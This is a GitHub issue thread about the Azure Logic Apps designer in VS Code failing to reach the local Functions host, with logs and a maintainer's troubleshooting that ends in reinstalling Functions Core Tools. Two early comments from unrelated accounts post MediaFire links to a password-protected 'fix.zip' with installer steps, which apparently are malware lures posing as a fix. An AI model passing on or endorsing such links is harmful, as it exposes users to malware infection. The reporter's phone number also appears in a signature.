### ISSUE TITLE
Unable to load the Azure Logic App Designer in VSCode

### ISSUE THREAD

**Issue by Mounesh1881** [Azure/LogicAppsUX#5527]
### Describe the Bug with repro steps 

12:27:07 PM: Error: Failed to detect running Functions host within "60" seconds. You may want to adjust the "azureLogicAppsStandard.pickProcessTimeout" setting.

 12:30:29 PM: Error: connect ECONNREFUSED 127.0.0.1:8000

 12:30:40 PM: Error: connect ECONNREFUSED 127.0.0.1:8000

12:38:58 PM: Running command: "C:\Users\Mounesh.Pattar.azurelogicapps\dependencies\FuncCoreTools\func host start --port 8000" with pid: "23940"…

Azure Functions Core Tools

 Core Tools Version: 4.0.5700 Commit hash: N/A +71cc84964a60bfb07d95839b7c666bd239507bdd (64-bit)

 Function Runtime Version: 4.33.2.22572

12:41:00 PM: Error: connect ECONNREFUSED 127.0.0.1:8000

always getting this connection error

### What type of Logic App Is this happening in? 

Consumption (Portal)

### Which operating system are you using? 

Windows

### Are you using new designer or old designer 

New Designer

### Did you refer to the TSG before filing this issue? [https://aka.ms/lauxtsg](<https://aka.ms/lauxtsg>) 

Yes

### Workflow JSON 

```json
{
  "definition": {
    "$schema": "https://schema.management.azure.com/providers/Microsoft.Logic/schemas/2016-06-01/workflowdefinition.json#",
    "actions": {},
    "contentVersion": "1.0.0.0",
    "outputs": {},
    "triggers": {}
  },
  "kind": "Stateful"
}
```

### Screenshots or Videos

*No response*

### Browser

chrome,edge

### Additional context

*No response*

**Comment by internet-person** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by ViniciusSCG** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Mounesh1881** [comment]
Hi

I am not able to open the link, which you have shared below.

Thanks & Regards,
Mounesh Pattar
Mobile: +91 9972804064

**Comment by Mounesh1881** [comment]
can i have updates.

Same error:

10:15:45 AM: Running command: "C:\Users\Mounesh.Pattar\.azurelogicapps\dependencies\FuncCoreTools\func host start --port 8000" with pid: "26340"...

Azure Functions Core Tools
Core Tools Version:       4.0.5700 Commit hash: N/A +71cc84964a60bfb07d95839b7c666bd239507bdd (64-bit)
Function Runtime Version: 4.33.2.22572

10:18:20 AM: Error: connect ECONNREFUSED 127.0.0.1:8000

**Comment by ccastrotrejo** [comment]
Hi @Mounesh1881 thanks for raising this issue. 
I don't see anything wrong with your workflow definition, as it is a new empty one.
- Do you see any other error in the console or in the output channel tab in vscode?
- Does it immediately throws the error after trying to open the designer?
- Are you able to see the func process running in your task manager?
- Could you please give it a try an update you function core tools in the dependencies? You can do that by deleting the whole folder in `"C:\Users\Mounesh.Pattar.azurelogicapps\dependencies\` and restart vscode

**Comment by ccastrotrejo** [comment]
Hi @Mounesh1881 I just figured out that your path when the extension logs the command that is running is wrong.
- The one you have `"C:\Users\Mounesh.Pattar.azurelogicapps\dependencies\FuncCoreTools\func host start --port 8000"`
- How it should be - `"C:\Users\Mounesh.Pattar\.azurelogicapps\dependencies\FuncCoreTools\func host start --port 8000"`

Could you please verify if your extension settings in your vscode settings configuration look like this? (the <username> is a placeholder, it should be your username in your computer)
Also these screenshots are from MacOS, therefore there should be `\` instead of the `/` in your configuration

<img width="963" alt="image" src="https://github.com/user-attachments/assets/bce11563-f50c-48e5-9c0f-3d5271850e9e">
<img width="1030" alt="image" src="https://github.com/user-attachments/assets/4fcba02b-1df5-4489-8cde-529f590c156c">

**Comment by Mounesh1881** [comment]
Hi

Below mentioned path looks fine.

Please find the error details here.

9:42:13 AM: Running command: "C:\Users\Mounesh.Pattar\.azurelogicapps\dependencies\FuncCoreTools\func host start --port 8000" with pid: "23172"...
NodeJs Binaries: C:\Users\Mounesh.Pattar\.azurelogicapps\dependencies\NodeJs
'C:\Users\Mounesh.Pattar\.azurelogicapps\dependencies\FuncCoreTools\func' is not recognized as an internal or external command,
operable program or batch file.
9:42:17 AM: No connection keys found to verify
9:42:23 AM: Azure Logic Apps Standard Runtime Dependencies validation and installation completed successfully.
FuncCoreTools Binaries: C:\Users\Mounesh.Pattar\.azurelogicapps\dependencies\FuncCoreTools
DotNetSDK Binaries: C:\Users\Mounesh.Pattar\.azurelogicapps\dependencies\DotNetSDK
9:43:05 AM: Running command: "C:\Users\Mounesh.Pattar\.azurelogicapps\dependencies\FuncCoreTools\func host start --port 8000" with pid: "21592"...
'C:\Users\Mounesh.Pattar\.azurelogicapps\dependencies\FuncCoreTools\func' is not recognized as an internal or external command,
operable program or batch file.
9:43:30 AM: Running command: "C:\Users\Mounesh.Pattar\.azurelogicapps\dependencies\FuncCoreTools\func host start --port 8000" with pid: "23344"...
'C:\Users\Mounesh.Pattar\.azurelogicapps\dependencies\FuncCoreTools\func' is not recognized as an internal or external command,
operable program or batch file.
9:44:12 AM: Running command: "C:\Users\Mounesh.Pattar\.azurelogicapps\dependencies\FuncCoreTools\func host start --port 8000" with pid: "12696"...
'C:\Users\Mounesh.Pattar\.azurelogicapps\dependencies\FuncCoreTools\func' is not recognized as an internal or external command,
operable program or batch file.
9:47:08 AM: Running command: "C:\Users\Mounesh.Pattar\.azurelogicapps\dependencies\FuncCoreTools\func host start --port 8000" with pid: "25288"...
'C:\Users\Mounesh.Pattar\.azurelogicapps\dependencies\FuncCoreTools\func' is not recognized as an internal or external command,
operable program or batch file.


Thanks & Regards,
Mounesh Pattar

**Comment by Mounesh1881** [comment]
![image](https://github.com/user-attachments/assets/d8bb5dd5-1afa-4ace-8bea-dbc595a65f5c)

**Comment by Mounesh1881** [comment]
![image](https://github.com/user-attachments/assets/89733567-f57e-4577-8ad8-d2c6f8cceed3)

**Comment by ccastrotrejo** [comment]
Thanks @Mounesh1881 for the info. I can't see anything wrong with it. It seems that despite you have your dependencies installed and the whole path is stated when running the command the `func` executor is not found. Lets do one thing. Could you please delete the dependencies folder and restart vscode? This will make a fresh installation from the dependencies and see if that works.

1. Delete the whole folder in this path `C:\Users\Mounesh.Pattar\.azurelogicapps\dependencies\FuncCoreTools`
2. Restart vscode
3. Wait for dependencies to download.

**Comment by Mounesh1881** [comment]
Hi,

Same issue still , tried to delete and create dependencies.

Error: 10:22:39 AM: No connection keys found to verify
10:22:40 AM: Running command: "C:\Users\Mounesh.Pattar\.azurelogicapps\dependencies\FuncCoreTools\func host start --port 8000" with pid: "29076"...
The system cannot find the path specified.
NodeJs Binaries: C:\Users\Mounesh.Pattar\.azurelogicapps\dependencies\NodeJs
FuncCoreTools Binaries: C:\Users\Mounesh.Pattar\.azurelogicapps\dependencies\FuncCoreTools
Creating temporary folder... C:\Users\MOUNES~1.PAT\AppData\Local\Temp\.azurelogicapps\FuncCoreTools
Downloading dependency from: https://github.com/Azure/azure-functions-core-tools/releases/download/4.0.5907/Azure.Functions.Cli.win-x64.4.0.5907.zip
10:27:49 AM: Timeout: validateFuncCoreToolsIsLatest
11:23:26 AM: Azure Logic Apps Standard Runtime Dependencies validation and installation completed successfully.
DotNetSDK Binaries: C:\Users\Mounesh.Pattar\.azurelogicapps\dependencies\DotNetSDK
11:23:43 AM: Running command: "C:\Users\Mounesh.Pattar\.azurelogicapps\dependencies\FuncCoreTools\func host start --port 8000" with pid: "36688"...
'C:\Users\Mounesh.Pattar\.azurelogicapps\dependencies\FuncCoreTools\func' is not recognized as an internal or external command,
operable program or batch file


Thanks & Regards,
Mounesh Pattar

**Comment by Mounesh1881** [comment]
i have uninstall and installed  node, sdk ,vscode.

created new logic app. still getting same issue.

Error : NodeJs Binaries: C:\Users\Mounesh.Pattar\.azurelogicapps\dependencies\NodeJs
FuncCoreTools Binaries: C:\Users\Mounesh.Pattar\.azurelogicapps\dependencies\FuncCoreTools
5:13:51 PM: Azure Logic Apps Standard Runtime Dependencies validation and installation completed successfully.
DotNetSDK Binaries: C:\Users\Mounesh.Pattar\.azurelogicapps\dependencies\DotNetSDK
5:13:54 PM: Running command: "C:\Users\Mounesh.Pattar\.azurelogicapps\dependencies\DotNetSDK\dotnet.exe --version"...
8.0.401
5:13:56 PM: Finished running command: "C:\Users\Mounesh.Pattar\.azurelogicapps\dependencies\DotNetSDK\dotnet.exe --version".
FuncCoreTools Binaries: C:\Users\Mounesh.Pattar\.azurelogicapps\dependencies\FuncCoreTools
5:14:23 PM: Running command: "C:\Users\Mounesh.Pattar\.azurelogicapps\dependencies\FuncCoreTools\func host start --port 8000" with pid: "27460"...
'C:\Users\Mounesh.Pattar\.azurelogicapps\dependencies\FuncCoreTools\func' is not recognized as an internal or external command,
operable program or batch file.
5:14:50 PM: Running command: "C:\Users\Mounesh.Pattar\.azurelogicapps\dependencies\FuncCoreTools\func host start --port 8000" with pid: "18356"...
'C:\Users\Mounesh.Pattar\.azurelogicapps\dependencies\FuncCoreTools\func' is not recognized as an internal or external command,
operable program or batch file.
5:16:16 PM: Running command: "C:\Users\Mounesh.Pattar\.azurelogicapps\dependencies\FuncCoreTools\func host start --port 8000" with pid: "20596"...
'C:\Users\Mounesh.Pattar\.azurelogicapps\dependencies\FuncCoreTools\func' is not recognized as an internal or external command,
operable program or batch file.
5:18:39 PM: Running command: "C:\Users\Mounesh.Pattar\.azurelogicapps\dependencies\FuncCoreTools\func host start --port 8000" with pid: "22856"...
'C:\Users\Mounesh.Pattar\.azurelogicapps\dependencies\FuncCoreTools\func' is not recognized as an internal or external command,
operable program or batch file.
5:19:52 PM: Error: connect ECONNREFUSED 127.0.0.1:8000
5:20:06 PM: Error: connect ECONNREFUSED 127.0.0.1:8000

**Comment by ccastrotrejo** [comment]
ok this is the main error `'C:\Users\Mounesh.Pattar.azurelogicapps\dependencies\FuncCoreTools\func' is not recognized as an internal or external command`
- Is there a func executable in that path?
- If you run the `C:\Users\Mounesh.Pattar.azurelogicapps\dependencies\FuncCoreTools\func host start ` in a vscode terminal do yo get the same error?

**Comment by Mounesh1881** [comment]
Hi Team,

It is resolved now... I have downloaded the zip file and extracted to below path then it start working.

GitHub Link: https://github.com/Azure/azure-functions-core-tools/releases



Thanks & Regards,
Mounesh Pattar

**Comment by ccastrotrejo** [comment]
Hi @Mounesh1881 thanks for confirming that. It seems that is was a function core tools installation issue
